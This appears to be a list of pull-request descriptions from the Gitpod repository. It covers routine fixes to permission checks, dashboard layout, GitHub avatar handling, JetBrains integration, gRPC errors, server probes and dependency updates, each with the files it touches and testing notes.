Fixes an oopsie I made in https://github.com/gitpod-io/gitpod/pull/20353 regarding permission checks. The change was supposed to unblock collaborators so that they can stream prebuild logs leveraging their permissions on the project level (in contrast to organization level), but I forgot to update the argument we pass to `checkPermissionOnProject` to be the `projectId` instead of the `organizationId` that was there before.
Fixes CLC-1011
There's a preview env: https://ft-fix-prebuilds.preview.gitpod-dev.com/prebuilds/
You can [join my org](https://ft-fix-prebuilds.preview.gitpod-dev.com/orgs/join?inviteId=55fdb16d-215e-4744-b1a7-5103d7ab914b) and look at [this prebuild](https://ft-fix-prebuilds.preview.gitpod-dev.com/prebuilds/6d341044-9811-407c-956c-28aa3d159149) to confirm streaming …
> [server] Fix permission check for logs streaming

- components/gitpod-cli/cmd/ports-list.go
Fixes CLC-984
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [cli] ports-list: Increase timeout for establishing connection + receiving response to 5s -> 10s

- components/dashboard/src/AppNotifications.tsx
Remove the AWS re:Invent notification logic and related code to streamline the notification system after the event.
> Cleanup AWS re:Invent notifications

- install/installer/pkg/components/ws-daemon/daemonset.go
We have NodeSwap enabled, and no limit set for ws-daemon, which often uses >10Gi of memory (to start and stop workspaces).
Related to CLC-1020
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [ws-daemon] reduce requested memory to 2Gi

- WORKSPACE.yaml
Build code version `1.96.0` (`e3618f085acb50b742485bf017936c476da04b74`)
<ul> …
> [VS Code Browser] Build stable code `1.96.0`

- components/dashboard/src/Insights.tsx
- components/dashboard/src/prebuilds/list/PrebuildListPage.tsx
- components/dashboard/src/repositories/list/RepositoryList.tsx
- components/dashboard/src/repositories/list/RepositoryTable.tsx
The pages right now did not properly keep their distance from the end of the viewport, making the last element hard to reach on mobile, unreadable and aesthetically displeasing.
| <img width="1319" alt="image" src="https://github.com/user-attachments/assets/cafb6f7c-be1f-4cca-9b73-4b6ba1cf3403" /> | <img width="1319" alt="image" src="https://github.com/user-attachments/assets/f358835d-35bb-422c-954a-615bb95f834d" /> | 
Fixes #
I tested these changes in a preview environment for another PR (see screenshots). Feel free to trigger a preview env for this one, but you'll also have to fill up the page with entities (such as prebuilds, repos or workspaces for insights) to observe the fixed margins.
/hold
> [dashboard] Fix bottom page margins for Prebuilds, Repositories and Insights

- components/dashboard/src/insights/download/download-sessions.ts
- components/public-api/typescript-common/src/public-api-converter.ts
An oopsie was made, and we were checking if the WS context is `NavigatorContext` instead of the proper and looser check against `CommitContext`, which also includes Issue and PR contexts.
This resulted in exported insights CSV reports to not have any of the ctx URL parsed segments available when the WS context was a PR.
Also changes the default download name of the CSV to differentiate it from the usage export.
> [server] Fix context setting for PRs for insights

- operations/observability/mixins/workspace/rules/satellite/workspaces.yaml
Fixes CLC-1042
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [obs] Make sure to not alert for 0 backup failures

- components/server/src/github/github-auth-provider.ts
A recent GitHub change changed the way of accessing a user's avatar. Potentially as an anti-bot/spam measure, GitHub now issues JWT-signed URLs for avatars on both https://github.com and as part of their API responses **to some users**, making it impossible for us to continue storing them like we do now - i.e. without any refreshes ever. Additionally, these JWT signatures inflate the URL length, preventing it from fitting into our DB's `avatarUrl` column.
Let's take a look at the new URL structure:
```
https://private-avatars.githubusercontent.com/u/37021919?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTEiLCJleHAiOjE3MzQ0MjYwMDAsIm5iZiI6MTczNDQyNDgwMCwicGF0aCI6Ii91LzM3MDIxOTE5In0.zOrR2kgZWVvZqcVgoUwADtQqQmZ6Yh …
```
> [server] fix private GitHub avatars

- components/gitpod-protocol/src/util/parse-workspace-id.spec.ts
- components/gitpod-protocol/src/util/parse-workspace-id.ts
- components/server/src/api/workspace-service-api.ts
Fixes a regression from https://github.com/gitpod-io/gitpod/pull/20269 which resulted in treating requests against legacy workspace IDs as invalid ones.
Fixes CLC-1055
Try doing a `GetWorkspace` with a UUIDv4 as the `workspaceId`.
/hold
> [server] Fix workspace service's workspace ID validation

- install/installer/pkg/components/proxy/deployment.go
- install/installer/pkg/components/public-api-server/deployment.go
- install/installer/pkg/components/public-api-server/deployment_test.go
Adds mounts of the custom CA to `proxy` and `public-api-server` deployments.
Fixes CLC-1056
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [installer] Mount custom CA certs into all relevant places

- components/public-api-server/pkg/apiv1/oidc.go
- components/server/src/user/user-authentication.ts
We are checking connectivity with the root of issuer, which might fail if the root is not serving anything. We sometimes get a `503` on this endpoint. So this PR replaces it to call `.well-known/openid-configuration` endpoint which should exist if it is a valid OIDC service
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're …
> [oidc] Fix the HEAD method call that checks reachability

- components/dashboard/src/components/podkit/buttons/LinkButton.tsx
- components/dashboard/src/start/StartWorkspace.tsx
There's a funny bug that happened when you favorited the Gitpod Dashboard in Arc: when you open a favorited website, it does not want you to leave its origin and upon redirection to another one opens it in a new tab. This would be cool with us if we didn't try to redirect you on every workspace status update (spoiler alert: we do).
This PR stores a `redirected` property in the React state and prevents multiple redirects from happening. There's also a tiny piece of UI that tells you what happened if you end up back in the favorited tab, with buttons to more easily retry or get back to the dashboard.
Fixes CLC-820
1. Get Arc
2. Favorite https://ft-fix-arc-redirects.preview.gitpod-dev.com/workspaces
3. Try opening a workspace
/hold
> [dashboard] Fix Arc favourites

- components/gitpod-protocol/go/gitpod-config-types.go
- components/server/src/workspace/workspace-service.ts
With this PR, I propose to log all garbage collection threshold changes for all regular workspaces. With, we'll be able to better understand the GC lifecycle of a single workspace when investigating false soft deletions.
The drawback I see here is that we'll most likely get a lot of these logs - most notably since we call `updateDeletionEligibilityTime` every time on `updateGitStatus`.
Related to https://gitpod.slack.com/archives/C071G5TTS49/p1734686954620309
1. [Start a workspace](https://ft-deletioef73c7c5bf.preview.gitpod-dev.com/new#https://github.com/gitpod-demos/voting-app)
2. Make a git change
3. [Observe logs](https://cloudlogging.app.goo.gl/xkrKKeuPYQE6QKTj6)
> [server] log all deletion eligibility time updates

- .devcontainer/Dockerfile
update devcontainer golang version
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> update devcontainer golang version

- .github/workflows/update-image-digest.yml
Bump the step dependent on create-pull-request, which solves the [problem](https://github.com/peter-evans/create-pull-request/issues/2790) we were seeing [here](https://github.com/gitpod-io/gitpod/actions/runs/12624306965/job/35174388601).
Fixes [this problem](https://gitpod.slack.com/archives/C0849UX0VEX/p1736123426493989)
Tested that we can find a PR and update it here: https://gitpod.slack.com/archives/C0849UX0VEX/p1736181485303439?thread_ts=1736123426.493989&cid=C0849UX0VEX
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [.github] bump update image digests create-pull-request step dependency

- .github/workflows/update-image-digest.yml
- install/installer/pkg/components/redis/constants.go
- install/installer/pkg/components/redis/deployment.go
Fixes CLC-1039
1. create preview env with monitoring, and start a workspace from this branch
2. run `./dev/preview/portforward-monitoring-satellite.sh`
3. access grafana dashboard and check `components-redis` dashboard, should be work as before
<ul>
<li><b>🏷️ Name</b> - pd-clc-1039</li>
<li><b>🔗 URL</b> - <a href="https://pd-clc-1039.preview.gitpod-dev.com/workspaces" target="_blank">pd-clc-1039.preview.gitpod-dev.com/workspaces</a>.</li> …
> switch redis-exporter docker image

- components/dashboard/.vscode/settings.json
- components/dashboard/src/Insights.tsx
It's been a week now since [we shipped](https://github.com/gitpod-io/gitpod/pull/20437) the first version of the Insights page, and since then, I've noticed a couple of things that could be improved.
Most importantly, this removes the superfluous time range selection, which is now only used when downloading a CSV out of the page.
Also improves the "no sessions found" message and the loading indicator.
https://ft-insight5923783b6e.preview.gitpod-dev.com/insights
You can [join my org](https://ft-insight5923783b6e.preview.gitpod-dev.com/orgs/join?inviteId=c8370f4a-54cb-4bda-bb47-c132637e9ac2) to have a session under `/insights`
> [dashboard] Insights page improvements

- WORKSPACE.yaml
Build code version `1.96.3` (`b889dadbf401a55d02e2fb98981d9c7832f07ea2`)
<ul> …
> [VS Code Browser] Build stable code `1.96.3`

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.96.3`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.30921</li> …
> [VS Code Browser] Update stable code to `1.96.3`

- .github/actions/integration-tests/action.yml
- .github/workflows/jetbrains-integration-test.yml
Motivation: https://github.com/gitpod-io/gitpod/actions/runs/12814148747/job/35730430190#step:4:3
https://github.blog/changelog/2024-04-16-deprecation-notice-v3-of-the-artifact-actions/
Fixes #
- ran "workspace integration tests" using this branches workflows, checkout works: https://github.com/gitpod-io/gitpod/actions/runs/12824451012/job/35760658348 :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
If enabled …
> [gha] Update actions/upload-artifact@v3 -> actions/upload-artifact@v4

- components/ide/jetbrains/launcher/main.go
- components/ide/jetbrains/launcher/main_test.go
- components/ws-manager-mk2/controllers/create.go
- dev/preview/workflow/preview/deploy-gitpod.sh
Fixes CLC-1085
1️⃣  Check xmx settings of JetBrains editor with different ws classes on preview environment
- IntelliJ + `small` workspace class -> `2G`
- IntelliJ + `large` workspace class -> 16G * 60% -> around `9G`
2️⃣ Customized vmoptions should override the default one
- Use `.gitpod.yml` [[docs](https://www.gitpod.io/docs/references/ides-and-editors/intellij#configure-jvm-options)]
- Use env `INTELLIJ_VMOPTIONS` configured on user settings. Like `INTELLIJ_VMOPTIONS=-Xmx3333m`
- ..
**Get current xmx settings**
<ul>
<li><b>🏷️ Name</b> - hw-clc-1085</li>
<li><b>🔗 URL</b> - <a href="https://hw-clc-1085.preview.gitpod-dev.com/workspaces" target="_blank">hw-clc-1085.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 …
> Auto-configure default JVM Xmx based on workspace resources

- .idea/misc.xml
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/GitpodCLIService.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/GitpodGatewayClientCustomizationProvider.kt
Fixes CLC-891
- Open a workspace with JetBrains IDE like IntelliJ on preview environment
- Exec commands like `gp open <file> -w` and `git rebase -i HEAD~2` should wait until user close the editor
- Relevant code paths such as `gp preview` will not be affected, it should work as before
<ul>
<li><b>🏷️ Name</b> - hw-fix-jb-cli</li>
<li><b>🔗 URL</b> - <a href="https://hw-fix-jb-cli.preview.gitpod-dev.com/workspaces" target="_blank">hw-fix-jb-cli.preview.gitpod-dev.com/workspaces</a>.</li> …
> [JetBrains] wait for the file to be closed before returning

- components/dashboard/src/components/ContextMenu.tsx
- components/dashboard/src/components/EmptyMessage.tsx
- components/dashboard/src/components/ItemsList.tsx
- components/dashboard/src/components/PrebuildLogs.tsx
- components/dashboard/src/components/UsageBasedBillingConfig.tsx
- components/dashboard/src/components/typography/headings.tsx
- components/dashboard/src/feedback-form/FeedbackComponent.tsx
- components/dashboard/src/index.css
- components/dashboard/src/menu/OrganizationSelector.tsx
- components/dashboard/src/onboarding/LinkedInBanner.tsx
- components/dashboard/src/prebuilds/list/PrebuildListEmptyState.tsx
- components/dashboard/src/prebuilds/list/PrebuildTable.tsx
- components/dashboard/src/repositories/list/RepoListEmptyState.tsx
- components/dashboard/src/repositories/list/RepositoryTable.tsx
- components/dashboard/src/start/StartWorkspace.tsx
- components/dashboard/src/teams/NewTeam.tsx
- components/dashboard/src/teams/TeamOnboarding.tsx
- components/dashboard/src/teams/TeamSettings.tsx
- components/dashboard/src/teams/variables/NamedOrganizationEnvvarItem.tsx
- components/dashboard/src/usage/UsageView.tsx
- components/dashboard/src/user-settings/EnvironmentVariables.tsx
- components/dashboard/src/user-settings/Integrations.tsx
- components/dashboard/src/user-settings/PersonalAccessTokens.tsx
- components/dashboard/src/user-settings/ShowTokenModal.tsx
- components/dashboard/src/workspaces/Workspaces.tsx
Fixes some small nits in the organization settings pages and also adds our adaptive Podkit colors (`pk-content-*` and `pk-surface-*`) to improve readability - these colors adapt to both light and dark modes, so the resulting markup is way shorter and actually communicates intent, rather than an arbitrary color value (like `text-gray-400`).
Fixes CLC-1097
Check it out on https://ft-color-fixes.preview.gitpod-dev.com/workspaces. There are some places with improved contrast (like the new organization button), but mostly changes are in code rather than actual design.
Here's the example of the new org button in dark mode:
| <img width="296" alt="image" src="https://github.com/user-attachments/assets/cead254e-8d4f-4dd5-bfeb-f6e6cabb3556" /> | <img …
> [dashboard] team setting design polish + more consistent color use

- components/dashboard/src/dedicated-setup/SetupLayout.tsx
- components/dashboard/src/teams/TeamSettings.tsx
Re-order the settings for `GITPOD_IMAGE_AUTH`, so that it's right next to the related workspace image settings.
Fixes https://gitpod.slack.com/archives/C071G5TTS49/p1737732283525949
Take a look at the preview environment's org settings.
https://ft-reorder0de6b997d6.preview.gitpod-dev.com/settings
<ul>
<li><b>🏷️ Name</b> - ft-reorder0de6b997d6</li>
<li><b>🔗 URL</b> - <a href="https://ft-reorder0de6b997d6.preview.gitpod-dev.com/workspaces" target="_blank">ft-reorder0de6b997d6.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how …
> [dashboard] re-order org docker auth config

- components/server/src/container-module.ts
- components/server/src/orgs/default-workspace-image-validator.ts
- components/server/src/orgs/organization-service.ts
- components/server/src/user/env-var-service.ts
- components/server/src/workspace/workspace-service.ts
- components/server/src/workspace/workspace-starter.ts
As a follow-up to https://github.com/gitpod-io/gitpod/pull/20538, this PR adds org-level `GITPOD_IMAGE_AUTH` authentication for base image validation.
This is relevant for validating workspace images when tweaking the organization settings and setting a new custom default workspace image.
Fixes CLC-1104
1. Sign up for https://ft-fix-add83ebcff3ec.preview.gitpod-dev.com/settings
2. After you've signed up, try setting `geropl/workspace-base:latest` as the default workspace image. It should not let you and result with an error
3. [Join my org](https://ft-fix-add83ebcff3ec.preview.gitpod-dev.com/orgs/join?inviteId=dfba92d4-b841-45d6-8638-7c312af8bfae) and try the same again, now it should let you proceed
4. Try setting the Docker Registry authentication on the same Organization settings page …
> [server] Add organization image auth context to workspace image validation

- components/dashboard/src/service/public-api.ts
- components/dashboard/src/service/service.tsx
- components/gitpod-db/src/redis/publisher.ts
- components/gitpod-protocol/src/redis.ts
- components/server/src/messaging/redis-subscriber.ts
- components/server/src/prebuilds/prebuild-manager.ts
- components/server/src/workspace/gitpod-server-impl.ts
- components/server/src/workspace/workspace-starter.ts
- components/spicedb/schema/schema.yaml
- components/ws-manager-bridge/src/prebuild-updater.ts
This PR makes a couple of related changes:
- most notably, whenever determining what client an API request should use, we always prefer the jsonRPC client if it's available and the request is a server-side-streaming request --> this should eliminate our HTTP/2 problems, hopefully
- removes the use of `disableWebsocketPrebuildUpdates`, and instead introduces a by-organization subscription for prebuild updates. This makes the listening much more efficient (requiring way fewer listeners) and scales well even with thousands of projects. Permission-wise, it relies on the organization's `read_prebuild` permission.
Fixes CLC-1106
1. Sign up for https://ft-stream-websockets.preview.gitpod-dev.com/workspaces
2. Try running a prebuild. It should stream updates via a websocket, but you should get …
> [server] make gRPC clients viable in non-HTTP/2-compatible environments

- components/dashboard/src/workspaces/RenameWorkspaceModal.tsx
- components/gitpod-protocol/src/protocol.ts
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/GitpodGatewayClientCustomizationProvider.kt
- components/server/src/workspace/workspace-starter.ts
Fixes CLC-1079
> [!NOTE]
> There's a limitation: `getHostnameShort` is only called one time by JetBrains on the editor start, so we can't update the NavBar when user updates workspace name. Only after they restart the workspace, the title on NavBar could change
- Open a workspace on preview env with IntelliJ
- Rename the workspace and restart workspace
- It should show the name on the NavBar
<ul>
<li><b>🏷️ Name</b> - hw-clc-1079</li>
<li><b>🔗 URL</b> - <a href="https://hw-clc-1079.preview.gitpod-dev.com/workspaces" target="_blank">hw-clc-1079.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec …
> [JetBrains] display workspace name on the navbar

- components/server/src/workspace/workspace-service.ts
Reverts a behavior we introduced in https://github.com/gitpod-io/gitpod/pull/20271 that prevented shifting the `deletionEligibilityTime` of a workspace backwards. This was problematic because workspaces with git changes are meant to live twice as long, but this change it made it so that "any workspace that ever had git changes" lived twice as long.
Fix CLC-1070
/hold
> [server] Don't block soft deletion rewinds in `updateDeletionEligibilityTime`

- components/dashboard/src/components/RepositoryFinder.tsx
- components/dashboard/src/data/git-providers/predefined-repos.ts
- components/dashboard/src/insights/download/DownloadInsights.tsx
- components/dashboard/src/repositories/detail/ConfigurationDetailGeneral.tsx
- components/dashboard/src/repositories/detail/general/ManageRepoSuggestion.tsx
- components/dashboard/src/repositories/list/RepoListItem.tsx
- components/dashboard/src/repositories/list/RepositoryTable.tsx
- components/dashboard/src/teams/TeamOnboarding.tsx
- components/dashboard/src/workspaces/Workspaces.tsx
This PR is a follow-up for #20559 and contains the following fixes:
- moves recommended repo management to the single repository detail
- adds a glowing kumquat-colored icon to suggestions in the new workspace dropdown
- fixed position of the <kbd>View</kbd> button for Repos in the repo list (regression from #20559)
- adds recommended repo cards into the collapsible getting started section in the workspaces list
| Collapsed | Expanded |
| <img width="1432" alt="image" src="https://github.com/user-attachments/assets/8190d34d-a5db-4ca2-9c05-db873f1ff95f" /> | <img width="1432" alt="image" src="https://github.com/user-attachments/assets/ae5d1c33-ded2-47d1-9a61-c744949d4d88" /> | 
Fixes CLC-1128
https://ft-repo-su3415b37f13.preview.gitpod-dev.com/workspaces
/hold
> Repo suggestions improvements

- components/dashboard/src/Insights.tsx
- components/dashboard/src/menu/OrganizationSelector.tsx
| Improved  menu items - not showing Insights for non-owners | Better "lacking permission" error |
| <img width="494" alt="image" src="https://github.com/user-attachments/assets/7f0e2f44-61bf-45e6-9db0-6c1df780acfa" /> | <img width="913" alt="image" src="https://github.com/user-attachments/assets/d36bd422-dc57-4c76-b2a0-114ef6257294" /> | 
Fixes CLC-1141 
https://ft-insightb31360f5bd.preview.gitpod-dev.com/insights
/hold
> Add permission check for Insights page and don't show it in the menu for non-owners

- components/image-builder-bob/pkg/proxy/proxy.go
- components/image-builder-bob/pkg/proxy/proxy_test.go
Fix image build failed for GAR
Fixes CLC-1099
1. create a dummy repo, and use image from https://hub.docker.com/r/gitpod/workspace-base/tags (You can choose an image that has never been used before. The key point here is that you need to re-trigger the image build function and upload at least one blob file)
2. try start workspace  from that repo in different preview env, make sure it failed.
3. try start workspace from that repo with this preview env, it will start image build and it should success
<ul>
<li><b>🏷️ Name</b> - pd-clc-1099</li>
<li><b>🔗 URL</b> - <a href="https://pd-clc-1099.preview.gitpod-dev.com/workspaces" target="_blank">pd-clc-1099.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - …
> Fix image build failed for GAR

- components/dashboard/src/Login.tsx
Fixes CLC-1149
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [dashboard] Remove shutdown notice

- components/public-api/typescript-common/fixtures/fromPartialConfiguration_2.golden
- components/public-api/typescript-common/fixtures/fromPartialConfiguration_3.golden
- components/public-api/typescript-common/fixtures/toConfiguration_1.golden
- components/public-api/typescript-common/fixtures/toConfiguration_2.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSettings_1.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSettings_2.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSettings_3.golden
Content is generated by `yarn test:forceUpdate`, changes looks good
Fixes https://github.com/gitpod-io/gitpod/actions/runs/13306529851/job/37158749104
PR build should be passed
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Fix main build

- .github/workflows/jetbrains-update-plugin-platform-template.yml
- components/ide/jetbrains/backend-plugin/gradle-latest.properties
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/GitpodClientProjectSessionTracker.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/latest/GitpodClientProjectSessionTracker.kt
- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/stable/GitpodClientProjectSessionTracker.kt
- components/ide/jetbrains/backend-plugin/src/main/resources-latest/META-INF/extensions.xml
- components/ide/jetbrains/backend-plugin/src/main/resources-stable/META-INF/extensions.xml
- components/ide/jetbrains/backend-plugin/src/main/resources/META-INF/plugin.xml
TODO:
Relates CLC-1123
~~**Integration tests**~~
~~Check integration tests of current PR, maybe some of them will be failed, but most of them should work~~
Integration tests will not work because the latest JB IDEs are not updated to `2025.1` yet, so we need to do smoke tests. (in case preview env is gone, you need to exec [this script](https://github.com/gitpod-io/gitpod/blob/hw/jb-release/components/ide/gha-update-image/BUILD.yaml#L2) to make it use the editor that uploaded by the [GHA](https://github.com/gitpod-io/gitpod/actions/workflows/jetbrains-auto-update.yml) from current branch
**Smoke test**
- Exec `leeway run components/ide/gha-update-image:jb-use-dev-latest` if the editor is not latest 2025.1
- Open workspace with latest JetBrains IDEs
|IntelliJ IDEA|GoLand|WebStorm| …
> Make JetBrains backend plugin compatible with `2025.1`

- .github/CODEOWNERS
- components/BUILD.yaml
Follow-up on #20624
Fixes CLC-1171
This works after landing on main:
```
docker pull eu.gcr.io/gitpod-core-dev/build/scheduler-extender:c1925d8
```
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [components] include scheduler-extender:docker in all-docker build

- components/server/src/authorization/spicedb.ts
[server] add feature flags for spicedb client options
The default value of the feature flag is `undefined`. If the feature flag is set to this value, we will use the default spicedb grpc client options, otherwise the value should be a valid json.
Relates CLC-370 ([internal chat](https://gitpod.slack.com/archives/C071G5TTS49/p1739870590350829?thread_ts=1739869326.120209&cid=C071G5TTS49))
- Update value of [FF](https://app.configcat.com/08da1258-64fb-4a8e-8a1e-51de773884f6/08da1258-6541-4fc7-8b61-c8b47f82f3a0/08da1258-6512-4ec0-80a3-3f6aa301f853?settingId=699989) , the value should be `JSON.stringify` grpc client options
- with correct grpc client options - use new option
- incorrect options - use default option
- invalid value - use default option
- Check logs of server and see if spicedb …
> [server] add feature flags for spicedb client options

- components/ide-proxy/Dockerfile
A chore update of https://github.com/EclipseFdn/publish-extensions/blob/master/extension-control/extensions.json. This time also with the repo migration from `open-vsx` to `EclipseFdn`, just like https://github.com/gitpod-io/gitpod/pull/20285.
No need to test besides it building correctly.
> [ide-proxy] update extension control manifest

- components/ws-daemon/pkg/controller/workspace_controller.go
Credit go to cline + Sonnet 3.7  for identifying this bug
prompt:
> I got an error when running our controller tests "ginkgo run pkg/controller" in the ws-daemon component, and I don't understand the error.
Please try yourself, try to make sense of the error, and come up with an idea on how to fix the root cause.
Fixes CLC-1185
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [ws-daemon] Fix panix in tests

- memory-bank/.clinerules
- memory-bank/activeContext.md
- memory-bank/components/content-service-api.md
- memory-bank/components/ide-metrics-api.md
- memory-bank/components/ide-service-api.md
- memory-bank/components/image-builder-api.md
- memory-bank/components/local-app-api.md
- memory-bank/components/registry-facade-api.md
- memory-bank/components/supervisor-api.md
- memory-bank/components/usage-api.md
- memory-bank/components/ws-daemon-api.md
- memory-bank/components/ws-manager-api.md
- memory-bank/components/ws-manager-bridge-api.md
- memory-bank/progress.md
- memory-bank/techContext.md
Teach cline more things about the repo:
- how to build components
- document the "-api" components as well (incl. how those are re-generated)
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [memory-bank] Update with more details

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.97.2`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.31692</li> …
> [VS Code Browser] Update stable code to `1.97.2`

- components/server/src/orgs/organization-service.spec.db.ts
- components/server/src/orgs/organization-service.ts
Fix unpin bug discovered in catfood
Fixes CLC-1189
- see the unit tests are :green_circle: 
- try here: https://gpl-1189-u2d2733f4ff.preview.gitpod-dev.com/workspaces
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [server] OrganizationService:Fix unpin for pinnedEditorVersions (don't use deepmerge but overwrite if set)

- .gitpod.yml
- scripts/install-git-mcp-go.sh
- scripts/install-linear-mcp-go.sh
Where the MCP servers have write access is governed by these env vars one can set in their Gitpod settings:
- `GIT_MCP_WRITE_ACCESS`: if `true`, it enables push
- `LINEAR_MCP_WRITE_ACCESS`: if `true`, it enables adding/updating linear comments and issues
Also, for linear to work, it requires a `LINEAR_API_KEY` to be present.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dev] Install git and linear MCP servers

- components/dashboard/src/data/organizations/suggested-repositories-query.ts
Fixes a regression from #20603 that would let the query give up and be fine with not having any data when org settings weren't loaded yet.
1. Sign up for https://ft-fix-orga9fb4e52ec.preview.gitpod-dev.com/workspaces
2. Observe the repo in the getting started section loads fine
/hold
> [dashboard] Fix org-suggested repositories when settings org query is fetching

- components/content-service-api/typescript/package.json
- components/gitpod-protocol/package.json
- components/gitpod-protocol/src/util/grpc.ts
- components/ide-metrics-api/typescript-grpc/package.json
- components/image-builder-api/typescript/package.json
- components/image-builder-api/typescript/src/sugar.ts
- components/server/package.json
- components/server/src/authorization/spicedb-authorizer.ts
- components/server/src/authorization/spicedb.ts
- components/server/src/container-module.ts
- components/server/src/util/content-service-sugar.ts
- components/supervisor-api/typescript-grpc/package.json
- components/ws-daemon-api/typescript/package.json
- components/ws-manager-api/typescript/package.json
- components/ws-manager-bridge-api/typescript/package.json
- yarn.lock
This PR is a fresh attempt at fixing the gRPC error `Error: 4 DEADLINE_EXCEEDED...Waiting for LB pick` we see every couple of weeks between `server` and `spicedb`. This seems always be triggered by the `spicedb` pods restarting, while we have active/new requests coming in.
Most likely it's fixed by bumping `grpc/grpc-js`, as there were at couple of potential fixes between `1.10.8` and `1.12.6` [[1](https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.11.3), [2](https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.10.11), [3](https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.10.10), [4](https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.12.4), ....].
It turned out we still get the `Waiting for LB pick`, where the client …
> [spicedb] Fix intermittent "Error: 4 DEADLINE_EXCEEDED...Waiting for LB pick"

- components/server/src/liveness/probes.ts
- components/server/src/liveness/readiness-controller.ts
- components/server/src/server.ts
- install/installer/pkg/components/server/deployment.go
The root issues was a dependency cycle which I did not test in the preview, where I only deployed server. :see_no_evil:
On full rollout, this happened
- dashboard deployed, pod waiting for server to come online
- server's ReadyProbe tried to retrieve feature flag synchronously, which never resolved :cross:
- maybe due to dashboard not being available?
Fixes CLC-1233
- go to https://gpl-fix-rollout.preview.gitpod-dev.com/workspaces
- open a workspace on this PR
- scale server pods up/down, and check logs for ready prove (`grep Readi`)
- note that feature flag resolution is async now
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> [server] Fix broken /ready endpoint and chaned the probe to be a StartupProbe

- components/server/src/container-module.ts
- components/server/src/liveness/probes.ts
- components/server/src/liveness/readiness-controller.ts
- components/server/src/liveness/startup-controller.ts
- components/server/src/server.ts
- install/installer/pkg/components/server/deployment.go
This PR does two things:
1. Rename `ReadinessController` to `StartupController` and mount it on `/startup`, because it's used by the `StartupProbe`
2. Introduce a fresh  `ReadinessController` which:
- always returns :+1:
- **except** when we already received SIGTERM, switching to :-1: 
Fixes CLC-1234
- installation: https://gpl-1234-sda36a70e7c.preview.gitpod-dev.com/workspaces 
- open a workspace on this PR
- do theses changes on the `server` deployment:
- scale `server` up and down
- `edit` and add/remove/change an env var
- and notice how you no longer see `2/2 Terminating` but `0/2 Terminating` instead :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details> …
> [server] Add /ready probe to smooth rollout of server pods

- WORKSPACE.yaml
- components/ide/code/leeway.Dockerfile
Build code version `1.98.2` (`6ad315d5bcd16de3666651b41fd00a709951aa7b`)
<ul> …
> [VS Code Browser] Build stable code `1.98.2`

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.98.2`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.31855</li> …
> [VS Code Browser] Update stable code to `1.98.2`

- components/ws-daemon/leeway.Dockerfile
Bump runc in ws-daemon, where it's used for content init
fixes
```JSON
{
"image": "/application/ws-daemon:commit-89e09307b91e83442270734fb0b56476d01699bf",
"results": [
{
"target": "usr/bin/runc",
"type": "gobinary",
"vulnerabilities": [
{
"cve": "CVE-2024-24790",
"package": "stdlib",
"version": "v1.20.13"
}
]
}
]
}
```
> Bump runc in ws-daemon

- components/dashboard/leeway.Dockerfile
- components/ide-proxy/Dockerfile
> Bump caddy to latest

- components/server/package.json
- components/server/src/init.ts
- yarn.lock
Drops gcloud-profiler as we are not using it anyway
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [server] Remove google-cloud-profiler

- .github/workflows/build.yml
- components/image-builder-bob/leeway.Dockerfile
Tool: gitpod/catfood.gitpod.cloud
